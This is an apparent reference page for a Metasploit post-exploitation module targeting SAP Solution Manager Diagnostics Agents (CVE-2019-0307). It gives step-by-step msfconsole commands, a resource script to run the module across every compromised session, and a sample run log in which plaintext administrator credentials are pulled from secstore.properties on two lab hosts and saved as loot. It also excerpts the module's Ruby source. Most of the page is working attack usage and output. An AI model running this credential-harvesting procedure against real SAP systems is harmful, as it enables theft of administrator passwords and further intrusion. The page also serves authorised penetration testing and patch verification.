Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server - Metasploit

This page contains detailed information about how to use the post/multi/sap/smdagent_get_properties metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview

Name: Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server
Module: post/multi/sap/smdagent_get_properties
Source code: modules/post/multi/sap/smdagent_get_properties.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): BSD, Linux, OSX, Unix, Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2019-0307

This module retrieves the secstore.properties file on a SMDAgent. This file contains the credentials used by the SMDAgent to connect to the SAP Solution Manager server.

Module Ranking and Traits

Module Ranking:

• normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/multi/sap/smdagent_get_properties

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/multi/sap/smdagent_get_properties
msf post(smdagent_get_properties) > show options
    ... show and set options ...
msf post(smdagent_get_properties) > set SESSION session-id
msf post(smdagent_get_properties) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:

framework.sessions.each_pair do |sid, session|
  run_single("use post/multi/sap/smdagent_get_properties")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

• SESSION: The session to run this module on.

Knowledge Base

msf6 post(multi/sap/smdagent_get_properties) > sessions

Active sessions
===============

  Id  Name  Type                     Information                             Connection
  --  ----  ----                     -----------                             ----------
  1         shell linux              SSH daaadm:TestPass1 (172.16.30.14:22)  192.168.50.2:58316 -> 172.16.30.14:22 (172.16.30.14)
  2         meterpreter x64/windows  SAP731\Administrator @ SAP731           0.0.0.0:0 -> 172.16.30.80:4444 (172.16.30.80)

msf6 post(multi/sap/smdagent_get_properties) > set SESSION 1
SESSION => 1
msf6 post(multi/sap/smdagent_get_properties) > run

[+] File /usr/sap/DAA/SMDA98/SMDAgent/configuration/runtime.properties saved in: /Users/vladimir/.msf4/loot/20210329205801_SAP_TEST_172.16.30.14_smdagent.propert_457968.txt
[+] File /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties saved in: /Users/vladimir/.msf4/loot/20210329205811_SAP_TEST_172.16.30.14_smdagent.propert_587689.txt

[*] Instance: SMDA98
[*] Runtime properties file name: /usr/sap/DAA/SMDA98/SMDAgent/configuration/runtime.properties
[*] Secstore properties file name: /usr/sap/DAA/SMDA98/SMDAgent/configuration/secstore.properties

[*] SLD properties:
[*] SLD protocol: http
[*] SLD hostname: solman.corp.test.com
[*] SLD port: 50000
[+] SLD username: j2ee_admin
[+] SLD password: asdQWE123

[*] SMD properties:
[*] SMD url: p4://172.16.30.46:50004
[+] SMD username: j2ee_admin
[+] SMD password: asdQWE123

[+] Store decoded credentials for SolMan server
[*] Post module execution completed
msf6 post(multi/sap/smdagent_get_properties) > set SESSION 2
SESSION => 2
msf6 post(multi/sap/smdagent_get_properties) > run

[+] File c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\runtime.properties saved in: /Users/vladimir/.msf4/loot/20210329205823_SAP_TEST_172.16.30.80_smdagent.propert_357417.txt
[+] File c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\secstore.properties saved in: /Users/vladimir/.msf4/loot/20210329205823_SAP_TEST_172.16.30.80_smdagent.propert_604626.txt

[*] Instance: SMDA97
[*] Runtime properties file name: c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\runtime.properties
[*] Secstore properties file name: c:\usr\sap\DAA\SMDA97\SMDAgent\configuration\secstore.properties

[*] SLD properties:
[*] SLD protocol: http
[*] SLD hostname: 172.16.30.46
[*] SLD port: 50000
[+] SLD username: SLDDSUSER
[+] SLD password: asdQWE123

[*] SMD properties:
[*] SMD url: p4://172.16.30.46:50004
[+] SMD username: j2ee_admin
[+] SMD password: asdQWE123

[+] Store decoded credentials for SolMan server
[*] Post module execution completed
msf6 post(multi/sap/smdagent_get_properties) > creds
Credentials
===========

host           origin         service           public      private    realm  private_type  JtR Format
----           ------         -------           ------      -------    -----  ------------  ----------
172.16.30.100  172.16.30.100  50000/tcp (http)  j2ee_admin  asdQWE123         Password
172.16.30.100  172.16.30.100  50000/tcp (http)  SLDDSUSER   asdQWE123         Password

msf6 post(multi/sap/smdagent_get_properties) > services
Services
========

host           port   proto  name  state  info
----           ----   -----  ----  -----  ----
172.16.30.46   50000  tcp    soap  open   SAP Solution Manager

msf6 post(multi/sap/smdagent_get_properties) > vulns

Vulnerabilities
===============

Timestamp                Host          Name                                                       References
---------                ----          ----                                                       ----------
2021-03-29 17:58:11 UTC  172.16.30.14  Diagnostics Agent in Solution Manager, stores unencrypted  CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown
                                        credentials for Solution Manager server                   002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who
                                                                                                  %20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf
2021-03-29 17:58:23 UTC  172.16.30.80  Diagnostics Agent in Solution Manager, stores unencrypted  CVE-2019-0307,URL-https://conference.hitb.org/hitblockdown
                                        credentials for Solution Manager server                   002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who
                                                                                                  %20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf

Go back to menu.

Msfconsole Usage

Here is how the multi/sap/smdagent_get_properties post exploitation module looks in the msfconsole:

msf6 > use post/multi/sap/smdagent_get_properties

msf6 post(multi/sap/smdagent_get_properties) > show info

       Name: Diagnostics Agent in Solution Manager, stores unencrypted credentials for Solution Manager server
     Module: post/multi/sap/smdagent_get_properties
   Platform: BSD, Linux, OSX, Unix, Windows
       Arch: 
       Rank: Normal

Provided by:
  Yvan Genuer
  Vladimir Ivanov

Compatible session types:
  Meterpreter
  Shell

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module retrieves the `secstore.properties` file on a SMDAgent. 
  This file contains the credentials used by the SMDAgent to connect 
  to the SAP Solution Manager server.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2019-0307
  https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf

Module Options

This is a complete list of options available in the multi/sap/smdagent_get_properties post exploitation module:

msf6 post(multi/sap/smdagent_get_properties) > show options

Module options (post/multi/sap/smdagent_get_properties):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options

Here is a complete list of advanced options supported by the multi/sap/smdagent_get_properties post exploitation module:

msf6 post(multi/sap/smdagent_get_properties) > show advanced

Module advanced options (post/multi/sap/smdagent_get_properties):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the multi/sap/smdagent_get_properties module can do:

msf6 post(multi/sap/smdagent_get_properties) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the multi/sap/smdagent_get_properties post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(multi/sap/smdagent_get_properties) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

SAP root directory not found

Here is a relevant code snippet related to the "SAP root directory not found" error message:

57:	      windows = false
58:	      instances = dir(UNIX_PREFIX)
59:	    end
60:	
61:	    if instances.nil? || instances.empty?
62:	      fail_with(Failure::NotFound, 'SAP root directory not found')
63:	    end
64:	
65:	    instances.each do |instance|
66:	      next if instance == 'SYS'
67:	

Failed to resolve SLD hostname: <SLD_HOSTNAME>

Here is a relevant code snippet related to the "Failed to resolve SLD hostname: <SLD_HOSTNAME>" error message:

151:	            else
152:	              begin
153:	                sld_address = session.net.resolve.resolve_host(sld_hostname)[:ip]
154:	                print_status("SLD address: #{sld_address}")
155:	              rescue Rex::Post::Meterpreter::RequestError
156:	                print_error("Failed to resolve SLD hostname: #{sld_hostname}")
157:	              end
158:	            end
159:	          end
160:	        end
161:	        print_status("SLD port: #{sld_port}") unless sld_port.nil?

File <SECSTORE_PROPERTIES_FILE_NAME> read, but this file is likely encrypted or does not contain credentials. This SMDAgent is likely patched.

Here is a relevant code snippet related to the "File <SECSTORE_PROPERTIES_FILE_NAME> read, but this file is likely encrypted or does not contain credentials. This SMDAgent is likely patched." error message:

173:	      end
174:	
175:	      # Store decoded credentials, report service and vuln
176:	      print_line
177:	      if sld_username.nil? || sld_password.nil?
178:	        print_error("File #{secstore_properties_file_name} read, but this file is likely encrypted or does not contain credentials. This SMDAgent is likely patched.")
179:	      else
180:	        # Store decoded credentials
181:	        print_good('Store decoded credentials for SolMan server')
182:	        if sld_address.nil? || sld_port.nil?
183:	          service_data = {}

Failed to read properties file: <FILENAME>

Here is a relevant code snippet related to the "Failed to read properties file: <FILENAME>" error message:

222:	  def parse_properties_file(filename, is_meterpreter)
223:	    properties = []
224:	    if file_exist?(filename)
225:	      properties_content = read_file(filename)
226:	      if properties_content.nil?
227:	        print_error("Failed to read properties file: #{filename}")
228:	      else
229:	        if is_meterpreter
230:	          agent_host = Rex::Socket.getaddress(session.sock.peerhost, true)
231:	        else
232:	          agent_host = session.session_host

File: <FILENAME> does not exist

Here is a relevant code snippet related to the "File: <FILENAME> does not exist" error message:

234:	        loot = store_loot('smdagent.properties', 'text/plain', agent_host, properties_content, filename, 'SMD Agent properties file')
235:	        print_good("File #{filename} saved in: #{loot}")
236:	        properties = parse_properties(properties_content)
237:	      end
238:	    else
239:	      print_error("File: #{filename} does not exist")
240:	    end
241:	    properties
242:	  end
243:	
244:	end

References

• CVE-2019-0307
• https://conference.hitb.org/hitblockdown002/materials/D2T1%20-%20SAP%20RCE%20-%20The%20Agent%20Who%20Spoke%20Too%20Much%20-%20Yvan%20Genuer.pdf

See Also

Check also the following modules related to this module:

• auxiliary/admin/sap/cve_2020_6207_solman_rce
• auxiliary/admin/sap/cve_2020_6287_ws_add_user
• auxiliary/admin/sap/sap_configservlet_exec_noauth
• auxiliary/admin/sap/sap_igs_xmlchart_xxe
• auxiliary/admin/sap/sap_mgmt_con_osexec
• auxiliary/dos/sap/sap_soap_rfc_eps_delete_file
• auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt
• auxiliary/scanner/sap/sap_hostctrl_getcomputersystem
• auxiliary/scanner/sap/sap_icf_public_info
• auxiliary/scanner/sap/sap_icm_urlscan
• auxiliary/scanner/sap/sap_mgmt_con_abaplog
• auxiliary/scanner/sap/sap_mgmt_con_brute_login
• auxiliary/scanner/sap/sap_mgmt_con_extractusers
• auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints
• auxiliary/scanner/sap/sap_mgmt_con_getenv
• auxiliary/scanner/sap/sap_mgmt_con_getlogfiles
• auxiliary/scanner/sap/sap_mgmt_con_getprocesslist
• auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter
• auxiliary/scanner/sap/sap_mgmt_con_instanceproperties
• auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles
• auxiliary/scanner/sap/sap_mgmt_con_listlogfiles
• auxiliary/scanner/sap/sap_mgmt_con_startprofile
• auxiliary/scanner/sap/sap_mgmt_con_version
• auxiliary/scanner/sap/sap_router_info_request
• auxiliary/scanner/sap/sap_router_portscanner
• auxiliary/scanner/sap/sap_service_discovery
• auxiliary/scanner/sap/sap_smb_relay
• auxiliary/scanner/sap/sap_soap_bapi_user_create1
• auxiliary/scanner/sap/sap_soap_rfc_brute_login
• auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec
• auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec
• auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing
• auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence
• auxiliary/scanner/sap/sap_soap_rfc_ping
• auxiliary/scanner/sap/sap_soap_rfc_read_table
• auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir
• auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface
• auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec
• auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec
• auxiliary/scanner/sap/sap_soap_rfc_system_info
• auxiliary/scanner/sap/sap_soap_th_saprel_disclosure
• auxiliary/scanner/sap/sap_web_gui_brute_login
• exploit/multi/sap/cve_2020_6207_solman_rs
• exploit/multi/sap/sap_mgmt_con_osexec_payload
• exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec
• exploit/multi/sap/sap_soap_rfc_sxpg_command_exec

Authors

• Yvan Genuer
• Vladimir Ivanov

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.